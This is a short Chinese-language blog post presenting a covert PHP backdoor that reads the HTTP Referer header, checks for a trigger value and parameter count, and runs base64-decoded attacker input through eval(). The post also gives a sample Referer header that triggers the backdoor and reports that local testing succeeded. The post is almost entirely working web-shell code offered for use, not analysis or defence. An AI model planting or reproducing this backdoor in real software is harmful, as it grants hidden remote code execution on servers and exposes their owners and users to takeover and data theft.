另类PHP Referer后门

通过HTTP请求中的Referer运行经过Base64编码的命令,达到后门效果。

--Code--
parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' &&
count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+",
join(array_slice($a,count($a)-3)))));echo '</star>';}
----------

在HTTP请求中的的Referer代码:
Referer: a1=iz&a2=&a3=&a4=&a5=&a6=&a7=&a8=&a0=cGhwaW5mbygpOw==
其中&a0=后门接运行的命令的Base64编码,本地测试成功。

posted on 2012-03-24 17:15  Sp1d3r  阅读(228)  评论(0编辑  收藏  举报

导航